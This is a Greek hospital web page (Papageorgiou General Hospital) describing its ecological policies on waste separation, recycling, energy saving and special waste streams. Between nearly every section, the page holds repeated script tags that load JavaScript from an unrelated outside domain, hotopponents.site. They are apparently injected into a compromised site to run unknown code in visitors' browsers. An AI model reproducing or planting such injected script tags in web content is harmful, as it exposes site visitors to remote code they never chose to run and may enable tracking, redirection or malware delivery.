Γενικές Πληροφορίες

Οικολογική Συνείδηση

Το Γενικό Νοσοκομείο Παπαγεωργίου, ευαισθητοποιημένο οικολογικά, ενισχύει και προωθεί την Οικολογική του Ευαισθησία, εφαρμόζοντας πολιτικές που αφορούν τους παρακάτω άξονες:

 • Διαχείριση Αποβλήτων
 • Εξοικονόμηση Ενέργειας
 • Βιοκλιματικός Αρχιτεκτονικός Σχεδιασμός Κτιρίων

Στόχος είναι, πέρα από την εφαρμογή της ισχύουσας νομοθεσίας, να περιοριστεί η επιβάρυνση του περιβάλλοντος και να ενισχυθεί η οικολογική συνείδηση των εργαζόμενων και των εισερχόμενων πολιτών, παρέχοντας υπηρεσίες που έχουν ως βάση το σεβασμό στον άνθρωπο και στο περιβάλλον. Ο σχεδιασμός και η υλοποίηση των δράσεων αποτελούν προϊόν συνεργασίας των Εποπτών Δημόσιας Υγείας της Διοικητικής Διεύθυνσης με τα τμήματα της Διεύθυνσης Τεχνικής Υπηρεσίας.

ΠΡΟΛΗΨΗ ΠΑΡΑΓΩΓΗΣ ΑΠΟΒΛΗΤΩΝ

Πρωτεύων στόχος του Νοσοκομείου μας είναι η πρόληψη στην παραγωγή αποβλήτων. Η πρόληψη επιτυγχάνεται με μεθόδους, όπως:

 • Ορθολογική διαχείριση αποθεμάτων
 • Σύστημα FIFO στους αποθηκευτικούς χώρους
 • Δημιουργία εσωτερικού δικτύου Intranet, με σκοπό τη μείωση έντυπης επικοινωνίας
 • Επιλογή εκτύπωσης διπλής όψης, αποφυγή έγχρωμων και άσκοπων εκτυπώσεων

ΕΝΑΛΛΑΚΤΙΚΗ ΔΙΑΧΕΙΡΙΣΗ ΑΠΟΒΛΗΤΩΝ

Το Νοσοκομείο μας, τηρεί τις υποχρεώσεις που απορρέουν από την κείμενη Νομοθεσία σχετικά με τη διαχείριση των Αποβλήτων από Υγειονομικές Μονάδες και συνεργάζεται με αδειοδοτημένες εταιρείες και τα εγκεκριμένα συλλογικά συστήματα εναλλακτικής διαχείρισης, προκειμένου να αξιοποιηθούν μεγάλες ποσότητες αποβλήτων, που παράγονται από τις δραστηριότητές του.

Ενημερωθείτε αναλυτικά για τις δράσεις οικολογικής ευαισθησίας του Γ.Ν.Παπαγεωργίου,

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Διαχείριση Αποβλήτων Νοσοκομειακών Μονάδων

Η Διαχείριση των Επικινδύνων Αποβλήτων του Νοσοκομείου μας γίνεται κατά τρόπο που διασφαλίζει την προστασία του περιβάλλοντος και της δημόσιας υγείας. Το Νοσοκομείο τηρεί τις υποχρεώσεις που απορρέουν από την κείμενη Νομοθεσία, συνεργάζεται με αδειοδοτημένες εταιρείες διαχείρισης αποβλήτων και μέσω των διαδικασιών που εφαρμόζει, ελέγχει και την περαιτέρω σύννομη διαχείριση των αποβλήτων.

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Χαρτί

Παράγεται από όλους τους χώρους του Νοσοκομείου. Συλλέγεται σε σακούλες χρώματος μπλε οι οποίες προσαρμόζονται σε κάδους πλαστικούς, ανοικτού τύπου, βαριάς κατασκευής, χρώματος μπλε.

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Πλαστικό

Παράγεται από όλους τους χώρους του Νοσοκομείου. Συλλέγεται σε σακούλες χρώματος λευκού οι οποίες προσαρμόζονται σε κάδους πλαστικούς, ανοικτού τύπου, βαριάς κατασκευής, χρώματος ανοικτού γκρι.

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Αλουμίνιο - Συσκευασίες

Παράγονται κυρίως από το κυλικείο και από το εστιατόριο του Νοσοκομείου.

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Μαγειρικά έλαια

Παράγονται από τα μαγειρεία του Νοσοκομείου.

<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Εξοικονόμηση ενέργειας

 • Χρήση λαμπτήρων φθορισμού ή PL ενεργειακής κλάσης Α.
 • Χρήση ηλεκτρονικών μπαλάστ.
 • Μείωση φωτισμού σε κοινόχρηστους χώρους όπου δεν κρίνεται απαραίτητος (διάδρομοι, αποθήκες).
 • Σταδιακή τοποθέτηση διακοπτών εξοικονόμησης ενέργειας για συσκευές και φωτισμό.
 • Εγκατάσταση Φωτοβολταϊκών 500 KW (υπό έγκριση).
 • Εφαρμογή προγράμματος optimum start & stop κλιματιστικών μονάδων.
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Εναλλακτική Διαχείριση Ειδικών Ρευμάτων Αποβλήτων

Τα αστικά στερεά απόβλητα στη σύγχρονη κοινωνία έχουν «εμπλουτιστεί» με νέα ρεύματα ειδικών αποβλήτων που απαιτούν ξεχωριστή, εναλλακτική, διαχείριση για να αποφευχθεί η επιβάρυνση του περιβάλλοντος με επικίνδυνα υλικά και ουσίες που εμπεριέχονται σε αυτά. Το Νοσοκομείο μας συνεργάζεται με εγκεκριμένα συλλογικά συστήματα για τη διαχείριση αυτών των αποβλήτων:

 • Μπαταρίες
 • Συσσωρευτές
 • Ηλεκτρικές-Ηλεκτρονικές συσκευές
 • Ηλεκτρικοί Λαμπτήρες
 • Ορυκτέλαια
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>
<script src='https://hotopponents.site/site.js?tight=2' type='text/javascript'></script>

Χρήση Οικολογικών Χρωμάτων

Η αναφορά σε χρώματα (βαφές) φιλικά προς το χρήστη και το περιβάλλον παραπέμπει συνήθως σε χρώματα με χαμηλή περιεκτικότητα σε ‘Πτητικές Οργανικές Ενώσεις’ (συντομογραφία: ΠΟΕ) ή κατά την αγγλόφωνη ορολογία ‘Volatile Organic Compounds’ (συντομογραφία: VOC).